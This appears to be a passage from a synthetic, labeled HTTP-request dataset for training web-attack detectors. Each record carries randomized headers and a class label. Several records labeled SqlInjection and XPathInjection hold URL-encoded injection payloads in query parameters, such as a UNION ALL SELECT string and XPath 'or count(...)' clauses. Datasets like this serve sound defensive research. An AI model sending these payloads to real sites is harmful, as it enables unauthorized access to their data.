Referer: http://mrlssbo.com/uustesr/tsS7sa.sh
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/3.4 (Windows; U; Win 9x 6.4; o4-wt; rv:1.2.3) Gecko/37353117
UA-CPU: Sparc
UA-Disp: 6549,336,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 3390x3162
Via: FTP/4.5 240.115.13.76, Eafdi/0.6 50.129.86.32, 8.9 251.190.129.26
Transfer-Encoding: deflate
Upgrade: fnhcG/7.7, 5Uaboe/0.6, satvhh/2.7
Warning: 068 www.th4ir3.htm "lsnwNndt" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 0800772649
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 14757
Start - Id: 34106
class: Valid
PUT /ak/Zdq.8xNfuYc-/nsAnnrmOdrkn/Q33/ihX-7lmqo_LTo/e2fPILgJMGIq/y-aW-nU14ZfS/ij-47TYjewARimsUso/g_r/fewptdlsA83eOhte.tiff? HTTP/1.1
Content-Length: 218
Content-Language: nn0oiuMg
Content-Encoding: deflate
Content-Location: http://www.foJecs2e.net/toob/rZaeia8e/iheget.mspx
Content-MD5: YXllc2U4ZXNjWU10eWNlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Feb 05 09:05:40 UTC
Last-Modified: Sat, 20 Jan 07 08:20:28 GMT
Host: www.cr2i.net
Connection: keep-alive
Accept: application/zip;q=0.0
Accept-Charset: iso-8859-1;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 98.90.32.49
Cookie: tei3etaaI=2035204;iesMsb=sSnbuZ;2w7lmn=e2cueeA;attSdddsNiNre=d)imysmeta%fv5c
Cookie2: $Version="240"
Date: Tue, 27 Apr 10 05:38:20 UTC
ETag: W/"bx-DIb4NlxeA.s."
Expect: etwta=fwts6;9czg=3esloi6c
From: tezpoln@ceidT.de
If-Modified-Since: Mon, 09 Apr 07 23:09:23 UTC
If-Unmodified-Since: Tue, 29 Apr 08 05:17:05 GMT
If-Match: "JZ472OVvg0zj3T1g"
If-None-Match: *
If-Range: Sat, 26 Aug 06 05:44:50 GMT
Max-Forwards: 2659
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic bmxlbzpsZHN0YmVteA==
Authorization: Digest uri=http://cedp.uk/aeas/eiedst0n.php
Range: -434362
Referer: http://usor.com/nnzihoEe/hutA8/ofeaym.jsp
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/4.9 (X11; U; Linux i586 7.3; dh-tM; rv:9.0.9) Gecko/91354785
UA-CPU: x86
UA-Disp: 654,4575,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 7731x678
Via: auEa/5.5 173.177.180.61, FTP/9.5 68.48.180.99, 1.7 135.55.239.195:98
Transfer-Encoding: deflate
Upgrade: e1e/1.0, 4det/7.3, 8t7kr/3.5, cltiom/7.6
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 37.174.184.200
X-Serial-Number: 794685
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

ofiepoqgs084ica=bindelete&tlcsnt0eW7p=4lm$q?mdtg&ehaldedos68e=ti nt(ftpsnqq?-elocationlan&Tfgr=l7HF&ecUmseo=oj8yt&AeooptlceheHn=rpa3YZiZz&tes=hQ_@Gkw&Gp9Nt8tcI=3624755&fhluue=2ozlnh4neate&eehaiswecr=rnocahwee

End - Id: 34106
Start - Id: 42536
class: SqlInjection
GET /sTn9/nila/eB-r6X/epyjRTc1nkaGAa-/oisdnwI/n0E8Vclo_-N/hqeewtnaeardiaNcd9yh/d0.US/Jktwindow.openformZCfyqZU/ecrnncei6j/imd.htm?et1t=%27bc%2B&e4Edd3n=a%40U&HTsock_stream0=tDNui6system-Nlo6ti&deletegfcopyXM6MY=%3Afdcdcesz%3C%26&qonl=eweXUM-w.uE&aild7mtooa0Yt=umjinTwseettUcDl&Wreplace0aH=csrsa3ou&rtdgetaecprp6=%27++UNION++++++++++++ALL+++++++SELECT+++ehestal+++++FROM+++++ptUeao+++WHERE+++++%27%27%3D%27&perhqzDstycOo=ttil&V5f6inh=57494369&nr5B=wt3sa%5CiirmAa2f&n50tRsc8agsifR=Stoestylearne&E9Ktiefn8htosc=t&Gpd=ghsyUesaseO HTTP/1.0
Host: 245.97.87.62:01
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress, gzip;q=0.9, gzip;q=0.5
Accept-Language: hh-edliycu, fi7ai-9batx;q=0.4, 3trEgtn-wItaes, ozN-lgbtedO
Cache-Control: min-fresh=8
Client-ip: 42.162.124.141
Cookie: boomtieotjeie=32870588;nrnntl=ta;PzliRt=b63
Cookie2: $Version="051"
Date: Fri, 19 May 06 22:56:03 UTC
ETag: "YaiKF0rmASDK-26T"
Expect: 100-continue
From: bs1as@pton6i0pc.org
If-Modified-Since: Thu, 19 Apr 07 16:35:47 CET
If-Unmodified-Since: Tue, 21 Apr 09 01:33:47 CET
If-Match: *
If-None-Match: "7j-xcBSZW92.lLPU5cSa"
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 5
MIME-Version: 1.7
Pragma: drde='7e'
Proxy-Authorization: mhmVs bt6gEeii=goImfere
Authorization: Digest qop=eyeeuasn
Range: 79786-446
Referer: /otInnsn/ieaiaSl/aeoi0es/oenxl6n/a5lOse.pdf
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: m.exVBZb http://www.YctRta.fr
UA-CPU: x86
UA-Disp: 1092,0849,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 0.7 169.218.51.163, 9.8 www.oheait.htm, neIr/3.8 www.iRrws4Ew.jpg
Transfer-Encoding: compress
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 080 122.26.58.92 "S5IseRilndhbniaya" "Sat, 05 May 07 24:34:31 UTC"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42536
Start - Id: 16652
class: Valid
GET /ydVe8oSIa1H@jYx9xP/geo0sgCVBFSK0A4x/o9t0ag/sCCwRdbY6YhwWl/0oJpassthruscopyidvw0tp/cfDk.wXs1ju/hytdeknNartmyhsjAtNe/Yots6sssvi2odsps/iYTlx-khq/dXsaruvr7Ainethq7tna.js?ngnashzumvait=81&5Xx6bS8zRqJreplace=65&hfdti=2380206&axpigIae3neng=s6&pnkste=oxpish&gaeefdaeg=tdiiollpcejAo0g&7iJel=55&ka=bodyexec%3Bo&8saaiNgieS=816&Ottbcumu=6&iQGlocationJB=s7euen9l&ayaoEidieet=ndksAbgdaeguowEh&enaoipuiEe=rom&uD37XaaXInja=nSt4eleod&ipucol=17841641 HTTP/1.0
Host: 105.173.62.232
Connection: close
Accept: video/*, image/jpeg;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: eoyamjd-reAyf;q=0.3, sIO-jieiou;q=0.5, settae-tlq1j;q=0.8
Cache-Control: only-if-cached
Client-ip: 242.14.122.91
Cookie: xuoage8=Qxaengersd4dt;oraibonb=es-evsscy;sstyleXX=anls;eoohEin=c a;rgw=eeaii4sinaaekc04y;osnroetdr=tE8gahro4dq
Cookie2: $Version="13"
Date: Sun, 15 May 05 22:36:35 UTC
ETag: "c_ZBqiEcehEn2bxb03n"
Expect: 100-continue
From: 7beimH@indn.it
If-Modified-Since: Fri, 18 Nov 05 05:48:06 UTC
If-Unmodified-Since: Thu, 06 Mar 08 04:38:13 CET
If-Match: *
If-None-Match: "9e8kPytn0hJEDg9R"
If-Range: Thu, 02 Jun 05 10:34:27 UTC
Max-Forwards: 39
MIME-Version: 3.7
Pragma: xttg='arW3hwA7'
Proxy-Authorization: NTLM dWV1ZXNpcmFzYmxsYjN0dnR6d21SdXRsZHRpaWV0bGFobGF1Z29x
Authorization: hmsefL a2irb=ahntosr
Range: -085,-96748
Referer: /sineDzEn/kteYee/etnrtl.pl
TE: gzip,chunked;q=0.9,gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 2.1; sr-rH; rv:2.4.5) Gecko/76797362
UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: 3.0 138.14.121.128:2, 8.8 121.148.94.96, 1.1 www.tn6hp.jpeg
Transfer-Encoding: identity
Upgrade: ombmMg/6.7
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16652
Start - Id: 10912
class: Valid
GET /lnceoo/S5AmxHE/5otr7drmeuntyef2si/Fzz/OAL8a7e1jn/-jwg/h4dk5oIaifha/yDlzdameys.cgi?zttibr=ets6tii1ls&epe0IaTinFapcli=tsArcoTwb&p-i5R=ymndadmstDsretstt&hs=dRtrf HTTP/1.0
Host: www.rtnilnert.fr:80
Connection: wemane
Accept: video/mpeg, audio/basic;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 6.106.207.165
Cookie: 14h8=jiaii;edfp0bhmpeomOo=7;pVceob0A6lr=iv7CcX;ildlg=aiframeascript%@)tfam0penNe;SpeiocUnnWmo=n8DF5NeDoZYY;U-mochaaccess_logVEdropMIUsu=86mE
Cookie2: $Version="966"
Date: Fri, 18 Sep 09 18:34:28 CET
ETag: "W22zb6uh_JIyN.3rvW"
Expect: 100-continue
From: vk1Iw@qOcre0I.cz
If-Modified-Since: Thu, 19 Nov 09 09:39:02 GMT
If-Unmodified-Since: Sun, 10 Apr 05 05:02:04 UTC
If-Match: "cnAX3sqK6SgP8Wu"
If-None-Match: "@crZOh_aHOpCrUZK.Ftx"
If-Range: Tue, 19 Jan 10 03:02:12 UTC
Max-Forwards: 11
MIME-Version: 6.5
Pragma: fetit=nmbhoSi
Proxy-Authorization: atsuIo ssTe=rsipu
Authorization: Digest nc=c9a6D36b
Range: 588592-19738,0954-52796,229852-
Referer: /Toqim.sh
TE: trailers,deflate;q=0.6,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.6 (compatible; Konqueror/1.7; Mac OS X; mjIfig; esyTDu)
UA-CPU: PowerPC
UA-Disp: 2674,4710,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 486x7334
Via: FTP/8.6 179.0.21.49, FTP/9.9 www.n3s0.tiff
Transfer-Encoding: identity
Upgrade: xivl/0.5, eLO/6.4
Warning: 388 108.74.176.251 "etzhmlodqe5yUnrTo" "Tue, 14 Jul 09 16:29:39 GMT"
X-Forwarded-For: 135.5.6.65
X-Serial-Number: 70193457062638076597
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 10912
Start - Id: 6067
class: Valid
PUT /hmrwcff57/AreewrdWtnridIwVe9/ec-_/s2jsetnpdwh/d6QbBtj/alloaa@cs.shtml? HTTP/1.0
Content-Length: 229
Content-Language: xlonzh,e9z
Content-Encoding: identity
Content-Location: http://amab.it/hn2hhYJa/otohtw/yeio.php3
Content-MD5: NG5yYWJpemllbG1zYmtjbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Sep 06 24:11:47 CET
Last-Modified: Thu, 27 May 04 02:37:01 UTC
Host: 172.113.248.199
Connection: keep-alive
Accept: video/mpeg, video/*
Accept-Charset: iso-8859-1;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: 8zrHsl42-fi, ehtin9ct-2a;q=0.2, srrrrtmc-eo;q=0.5, tHnUiae-ecoor
Cache-Control: no-store
Client-ip: 152.152.106.164
Cookie: 3mXy0OkUGEn=usrb$T;hrshn8=7;ibnemu=eWKmwUEwb7v;in=10
Cookie2: $Version="9"
Date: Thu, 02 Sep 04 07:17:20 CET
ETag: W/"kNA2_5UY27UH@k.gwUm"
Expect: 100-continue
From: erlflf@Se8Hrtns.com
If-Modified-Since: Wed, 26 Oct 05 22:02:30 UTC
If-Unmodified-Since: Mon, 05 May 08 09:42:17 UTC
If-Match: "JyxyW1.HBqEb_Oa1q"
If-None-Match: *
If-Range: Fri, 16 Feb 07 21:06:10 GMT
Max-Forwards: 7975
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/kgj1ehet/pnldts/rwlseod/iTpt6ia/uotey0if.php
Authorization: Basic c2gzYTppaGVzcnV0
Range: 8100-26
Referer: http://oRae.de/mlfkan.jsp
TE: chunked;q=0.5
Trailer: If-Unmodified-Since
User-Agent: lk0DdEQA http://www.tnpq.net
UA-CPU: Sparc
UA-Disp: 6911,1089,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 179x0676
Via: HTTP/6.5 www.tsebs.htm
Transfer-Encoding: compress
Upgrade: has5y/4.3, eeohRn/1.7, ahe/4.9, isrias/0.3, tsayOs/5.2
Warning: 872 4.222.14.84:89 "ieaaIaa" "Tue, 06 Dec 05 18:11:53 GMT"
X-Forwarded-For: 162.114.213.90
X-Serial-Number: 172658995199339
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4ieiyfeenCri=168&vgc=xp_ic3&rveh8olaItnrin=$ro&rlbrs3219no=Un<ydsock_stream'aheopenaselectj&fbdee=rpys Rnr@inputEet&n0edn=224956&etfhibseimeln=ohetieh&ihtpass1D19BB=aduttln&etpeseit=t&Fstyle3YstdintgservicesDQPI=142279566

End - Id: 6067
Start - Id: 1608
class: Valid
GET /tw-WRjQ62cnXzrgvw3L/4YJz4EErls0ntM-FO9/shyoem/8adfqecao/FGAVr/e4ftLYh/httpJUASPWxp_CCiY-a/eOA5S8bHX0tJ_.asp?stdinWHQl=jiRbrtsEotierchsl7&trmrenelteo3=4insertt&lh4hsagestahA4g=ar+jetpt%3Cjol6-9qutar&wlpsgraaRe=qh54s&AAZuS8_=127017&tT=0975973&c2oaaTkjcpisyes=+dlf HTTP/1.1
Host: www.ht5vhv.gov
Connection: Ardje
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: mncse=e
Client-ip: 40.233.88.212
Cookie: en85si=eoy;mt=21058647;daapeoeedrrn=0;70fdPs=fa2syn
Cookie2: $Version="985"
Date: Fri, 06 Jan 06 24:30:51 GMT
ETag: W/"6cpkX8A2dmE5vzI0gZEY"
Expect: o870
From: ncrh@iounf.uk
If-Modified-Since: Tue, 20 Jan 04 18:34:53 UTC
If-Unmodified-Since: Sat, 09 Oct 04 11:50:28 GMT
If-Match: "zgR5x.mx1iIV@w5J"
If-None-Match: "ddR_HqjoP8Ck@f8ASh-"
If-Range: "LgxQ4kyZzUvJ36b6YD"
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2lFenI6eHR0bGVlYQ==
Authorization: NTLM dGxzYWxiYTlzRHVuc29xSW93ZTFlaWhQZXZld3RJbDhldHQ3aGVwcmRlOHM4bHg=
Referer: http://www.wdXAOpi.net/sp9canh/caeae/sarxio.asp
Trailer: Authorization
User-Agent: irerjvgsny
Via: HTTP/0.5 www.tcsstS4p.tiff, 0.0 233.139.79.245
Transfer-Encoding: deflate
Upgrade: sTSZ/4.6, yc0et/6.6
Warning: 694 254.66.88.83:7 "ithrnim0obb5iieHN" "Wed, 17 Aug 05 12:23:04 GMT"
----: ---------------------

null

End - Id: 1608
Start - Id: 20656
class: Valid
GET /gk/eMZgChRbr4Q-K1uNT/e-w1Jn39uqeVL/athrorhpX/lns/ny0e55/eJ06hFsL/3_3tSQjR8Dr/.vfromZ4goA@ncNPsam9/igyLF/hGb9/txe6ioeaasdtimh34m.shtml?nqlsfrolnnmeq=39613&wk7.=ukZbN5L&5MC_92NxL=7ggi2beb&derdgee=05977&dQ_Qvar=461979&uoEhicrHsleowi=re7qsh58&s9rcTGiseoe=iIWUvROhz6&4oneo2t9di9ec=lY0J4&il2osiiyswll=3&xmdsm=175800625&rtdaepsntk=2746101&bEo1=173060049 HTTP/1.0
Host: 48.6.235.6
Connection: close
Accept: audio/basic;q=0.2, application/*, audio/*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 53.239.120.48
Cookie: beraPdcnz9abhd=Tshe 1ze$v89sainclude;csexecJS.=o3_79g;hains=070;eqndrutry=N3ib;bbtd31eeR=oH143gtlXZm
Cookie2: $Version="73"
Date: Thu, 22 Feb 07 07:32:10 CET
ETag: W/"Bn6eOYe9yVPtU0NkOL"
Expect: 100-continue
From: ihe4r@bhoxbwdih.net
If-Modified-Since: Sun, 18 Feb 07 02:43:02 GMT
If-Unmodified-Since: Sun, 31 Oct 04 19:34:07 CET
If-Match: "Pw2BYXm1ELI5Wt4HJpf"
If-None-Match: *
If-Range: "P9KIdcOh_y21oi3hkk"
Max-Forwards: 43
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: Basic ZFRzaXg6YWVyZnM=
Range: 51052-869,5231-71629
Referer: http://www.tHokx.org/tatd.tiff
TE: trailers
Trailer: Cache-Control
User-Agent: ovJWoRT http://www.dkqEel.de
UA-CPU: PowerPC
UA-Disp: 629,430,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 060x083
Via: oeh/5.3 196.40.104.154, FTP/2.7 www.nnn4iluy.css, HTTP/7.3 107.199.212.161
Transfer-Encoding: deflate
Upgrade: uetty/9.5, 9so2/7.4, stjts/1.7, yh7t/7.0
Warning: 161 www.yspael.tiff:6088 "aiusaddtrh" "Sat, 10 Jun 06 17:32:05 UTC"
X-Forwarded-For: 223.197.65.113
X-Serial-Number: 5076474015762561578
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20656
Start - Id: 28359
class: Valid
GET /9https2ivGkstyle-vpmYVE/ucsensin.htm?5ewnAb0UsIbno=12734&7udtXHC=2AdO9Y_t&ozo=99175&Rat5on0Qd8=8559306&thaei=1428&GNegwaelntd=%2Be&ehitte2tbn=igMvh&aetns9=ifv%7Eet&aazT=atmp HTTP/1.1
Host: www.eIaii.it
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.5, utf-8
Accept-Encoding: *;q=0.4
Accept-Language: heltu-sea, eswrtu3V-eawl;q=0.0
Cache-Control: no-store
Client-ip: 228.194.151.128
Cookie: o0eva7PhTz=eIotuhnatpdn;r@etcB.R=o9-;9EEP2A=21686572
Cookie2: $Version="196"
Date: Fri, 11 Sep 09 07:30:22 CET
ETag: "Z8_.2x5.bSAj.YwmPE7"
Expect: 8nLiii=redn
From: sszbHesr@flnNa.be
If-Modified-Since: Mon, 16 Mar 09 16:33:00 GMT
If-Unmodified-Since: Wed, 22 Jul 09 15:03:12 UTC
If-Match: "0DrBJX_InKPII6JU"
If-None-Match: "SEwLq04Vpy3i5XqyG"
If-Range: Wed, 03 Mar 10 24:57:44 GMT
Max-Forwards: 107
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic dGVTNGE6VGZ0aA==
Authorization: Basic c2VlNWlFT206dUZ1bjJi
Range: 5-362340,-79,830-62
Referer: /htun/hdain/hekb/yrApiu.php3
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: hihuahbol
UA-CPU: StrongARM
UA-Disp: 547,716,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6491x0728
Via: HTTP/0.5 104.226.96.99, 3.4 250.93.225.233
Transfer-Encoding: identity
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 976 163.70.1.255 "k7Tsaetaotwo" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 3075652
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28359
Start - Id: 26226
class: Valid
GET /--4form0P1547/he6K/eSS/Q7i9bizovtAajs0n5i/xp_3/Eflwem20afeyedhucOi/t.vxS.asmx?hohrNl=31&rqtpanbia=Ao3eewTied&AU4group byRqFdAMX=taesoedllAer2k&IagseXaeo=Ha0+m%3B%24+4e&girsllmyn4C=tjpx0&Tnn=having%3E&nbipi5tod5oaarn=niouxtermnogft&ead1tEheo=fhn+t&i5cfstnHreikuve=337093&hsUsNsssg1bu=s-CFNP0&RMqrcp47m=slarhon0nev-e HTTP/1.0
Host: 62.1.180.92
Connection: endno
Accept: text/*, image/*, application/postscript
Accept-Charset: ks_c_5601-1987, windows-1252, iso-8859-6, windows-1251, x-mac-arabic
Accept-Encoding: *
Accept-Language: a6rt-etsnsS;q=0.3
Cache-Control: max-age=9885
Client-ip: 237.86.185.182
Cookie: house0sotl=sjoni
Cookie2: $Version="776"
Date: Wed, 21 Dec 05 15:19:00 GMT
ETag: W/"-jfRr2Ew35J@o6u"
Expect: 100-continue
From: nee1w@ahcdw.uk
If-Modified-Since: Sun, 01 Oct 06 20:00:51 UTC
If-Unmodified-Since: Tue, 20 Sep 05 08:17:56 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Oct 08 19:33:02 CET
Max-Forwards: 7077
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic U0RscG5vOnNpOXVm
Range: 7313-
Referer: /ieeawpc/cqOt9/ae0ulI3/ahma1c/leuHan.js
TE: chunked;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: mtaadu/5.9.6.6
UA-CPU: PowerPC
UA-Disp: 9474,169,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 539x1733
Via: 7.4 www.ftemD8s.shtml, 3.0 www.sgpf.jpeg, ir2et/4.4 176.166.72.110:91
Transfer-Encoding: deflate
Upgrade: iguI/8.7, wzsse4/6.7
Warning: 403 www.1ernaeea.tiff "sB1ntt" "Thu, 29 Jan 04 19:12:54 UTC"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 30560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26226
Start - Id: 49366
class: XPathInjection
GET /kv8likeJ4VfA0mprocessing-instructiondFE/u7Ap5I2MrBykx@yF.htm?oid6drti=epamgs&eiihtnaau=aIu-.HbE&WifyYvb=62168&teDLw4=0961189&8wget9bzF=RueldA%27++or++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++i+%2B+j%2B++++k++++%2B+l+++%2B++1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++%27hrarcm%27++%3D++%27++++rlnjuiq%27++++or&ungbl2ieat=var%3FhS&fistvse=a5XLTvPrNI&Gwtmail-UP=nMtpd&Fs1ewhdntmn=iu4ooe&ynslao=n8window.open%3E%26e HTTP/1.1
Host: 224.172.114.198
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.1
Accept-Language: wn-onh;q=0.8, szd-sP3mcno, lane-eugePa7;q=0.8, strltbe-qbbgYE, es-3ksfri;q=0.3
Cache-Control: no-store
Client-ip: 30.6.154.223
Cookie: IHeeegnUeXdrt=399919;9@QOautoexecLI=edHl|tcuz%a;aGtalcutpOYTee5=<miwH;teddN=o-W2Ia_y1n;opp5m5wschFmdsh=9ireooeeRs0dAgot
Cookie2: $Version="93"
Date: Fri, 10 Mar 06 07:09:06 GMT
ETag: "gRqaxicCjKmiIeMRRJ"
Expect: 100-continue
From: deodan@edhI.net
If-Modified-Since: Sun, 28 Aug 05 09:49:31 UTC
If-Unmodified-Since: Fri, 10 Oct 08 06:00:11 UTC
If-Match: "7DheMCjIC6iresQ6Eb"
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 7.0
Pragma: jgosdoiC=pe7rd
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: Digest response="B78BfCe2EEBf82B7C940d290C7C9afAB"
Range: -9178,535260-09009
Referer: http://eatcaa.com/fdthT/ioxnn/ilmhup.pdf
TE: chunked;q=0.5
Trailer: Pragma
User-Agent: tssxrTb/1.1
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3843x971
Via: 7Ebau/2.5 108.53.127.40, 9.2 www.eatkmm.shtml:8
Transfer-Encoding: compress
Upgrade: wsem/7.8, MtRxo/3.9, i75/3.8, tecnp/1.2
Warning: 935 246.135.154.171 "wpboie" "Tue, 30 Jun 09 03:56:30 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49366
Start - Id: 33975
class: Valid
PUT /izcP5QliSWsUpOjGE/xtq@o-ZzGRGQok/h4x-CC1rQIb9s0/m@GUInQ/tPaincvhleqs/s_B/e1SNd/yc_KORWHU6/-hocBNscriptR1.1oH/services-@f/ahlup.js? HTTP/1.0
Content-Length: 95
Content-Language: efds,rs9ag
Content-Encoding: gzip
Content-Location: http://tascwet2.org/zhdreii/lieTrr3l.mpg
Content-MD5: bm5hdGZvdGNlbmlLaWVjbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Feb 07 17:34:55 CET
Last-Modified: Tue, 18 May 04 16:50:46 CET
Host: www.tucgZjOt.ch
Connection: keep-alive
Accept: application/zip;q=0.0
Accept-Charset: x-mac-korean;q=0.8, windows-1250;q=0.9
Accept-Encoding: deflate, identity;q=0.9, deflate;q=0.5, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 43.110.203.17
Cookie: khoLhryeeraE=nosI4N;ri1DfH8m=ocebe2sotci1coW;imitncshai=35;Twk166ahst=shTOl;yosEantLY=tlodb27io
Cookie2: $Version="02"
Date: Wed, 11 Oct 06 24:45:30 CET
ETag: "_a0_64jbSCr6SnLUs"
Expect: svgAaal=iesSa
From: soes@hhlkpoRi.fr
If-Modified-Since: Thu, 03 Apr 08 03:53:25 GMT
If-Unmodified-Since: Mon, 08 Dec 08 12:25:35 GMT
If-Match: *
If-None-Match: *
If-Range: "UBr_nLC1y.WnH4kJ"
Max-Forwards: 0497
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: ent5 n2sjg=ca4rln6
Authorization: Digest nonce
Range: 7-987,-0542
Referer: http://www.do9zo.biz/jodr/8Rszt/d6e7r/2nhjseos/6widaniM.php4
TE: trailers,gzip;q=0.3,deflate
Trailer: Via
User-Agent: Mozilla/7.9 (Windows; U; Windows NT 1.2; cc-eb; rv:2.4.3) Gecko/76926906
UA-CPU: Sparc
UA-Disp: 225,357,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 354x173
Via: waa/7.1 199.148.45.204, ett/9.5 www.823rdb.htm
Transfer-Encoding: gzip
Upgrade: tda/4.5, ahiiil/2.1, t4m/4.0
Warning: 702 237.154.44.239:055 "adahlhccmtnRndtt" "Thu, 03 Sep 09 08:04:46 UTC"
X-Forwarded-For: 48.2.222.131
X-Serial-Number: 33226
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

oarf=7nalo&yksoh1jb2O=e]l4liTes &8Guj@=i-YbXcv&j6i=h l&cMGTwE=tszwirTuu&tnIxnSa2teacne=640020

End - Id: 33975
Start - Id: 49050
class: XPathInjection
GET /cdAKS/o..ZS08C15VNZ9y/izipueiasnamq4depa0t/peoaPP5eQeaO/rfsUG9ahxalakoaniod/c5GeMwq_tS19OcqBld/3neuet3toee/cmdem9kpN/Yxu/3inmerbtzm/fyhBDv8aNyeo-ZdiMDA.tiff?azs=psiH%27+or+++++1%3C+++il%2Ftlxtc%2FgEjto%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D527%5D+++++or+++%272rt6%27+%3D+%27&trnpfugdr6ed0=se7er5n HTTP/1.1
Host: www.r1rsz.net
Connection: close
Accept: image/*;q=0.2, audio/x-wav;q=0.2, video/*
Accept-Charset: x-mac-ce;q=0.3
Accept-Encoding: 
Accept-Language: st-oqSol, dI-uaa;q=0.8, mebrr-h, hnlers-oteltel;q=0.6, a5srxO-ism;q=0.0
Cache-Control: no-cache
Client-ip: 12.96.10.110
Cookie: mialStT3ao=ts8MfQnq;5sulvk=uiet;nldw9UyKXIxU=p-a|s9i
Cookie2: $Version="8"
Date: Sat, 05 Mar 05 13:12:09 UTC
ETag: "Yf@q6Cv-kVW2Zxi"
Expect: oEz1em=waeor
From: thhe@eis9.be
If-Modified-Since: Fri, 08 Aug 08 15:09:20 CET
If-Unmodified-Since: Mon, 04 Jul 05 05:20:37 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 30 Jul 07 07:15:27 CET
Max-Forwards: 6495
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: 2359-0,-77
Referer: /6pom9/a3tefbz/aluiof/sgpw65S/eb5inibM.mdb
TE: trailers,gzip;q=0.0,trailers
Trailer: Referer
User-Agent: diwexi7e (hTAIAUv)
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 003x367
Via: 3.4 106.158.45.224, 4.8 247.178.238.193
Transfer-Encoding: identity
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 835 www.nteiea.shtml "rasrr" "Fri, 06 Jul 07 12:28:32 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
